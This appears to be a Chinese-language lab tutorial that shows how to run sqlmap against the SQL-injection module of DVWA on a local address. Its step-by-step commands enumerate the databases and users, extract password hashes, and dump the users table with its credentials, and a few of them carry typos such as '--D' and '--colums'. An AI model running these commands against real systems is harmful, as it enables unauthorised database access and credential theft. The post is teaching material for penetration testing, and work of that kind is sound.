课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali与编程,学习更多网络攻防干货!
3、下篇文章将在明天下午五点发布,敬请关注!
一、背景介绍
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。
二、 准备工作
安装好Kali Linux的虚拟机一台;整装待发的小白一个。三、详细步骤
1. 在浏览器中输入自己的ip地址打开dvwa的主页面
2. 选择默认安全等级
3. 进入sql注入模块
4. 随便提交一个数据发现网站提交数据的方式是GET,然后复制地址栏上的URL
5. 按F12打开浏览器的开发人员工具,然后刷新页面找到刚刚那个请求,然后在请求的请求头中找到cookie,复制其中的值到记事本中
6. 回到kali打开终端输入以下命令
root@kali:-# sqlmap -u "http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#" --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --dbs
7. 回车后可以看见该网页所有的数据库被爆了出来
8. 查看当前数据库
root@kali:-# sqlmap -u "http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#" --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --current-db
9. 查看数据库中的用户
root@kali:-# sqlmap -u "http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#" --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --users
10. 查看用户名和密码
root@kali:-# sqlmap -u "http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#" --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --users --passwords
11. 查看某数据库中的所有表
root@kali:-# sqlmap -u "http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#" --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa --tables
12. 查看某表中的数据
root@kali:-# sqlmap -u "http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#" --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa -T users --colums
13. 保存到本地
root@kali:-# sqlmap -u "http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#" --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa -T users -C "user,password" --dump
14. 查看刚刚保存的内容
root@kali:~# cat/root/.sqLmap/output/192.168.0.101/dump/dvwa/users.cvs
原创不易,各位看官记得好评加关注哦!你也可搜索: Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
如果觉得《网络安全工程师教你Kali Linux渗透:Sqlmap数据库攻防实战技巧》对你有帮助,请点赞、收藏,并留下你的观点哦!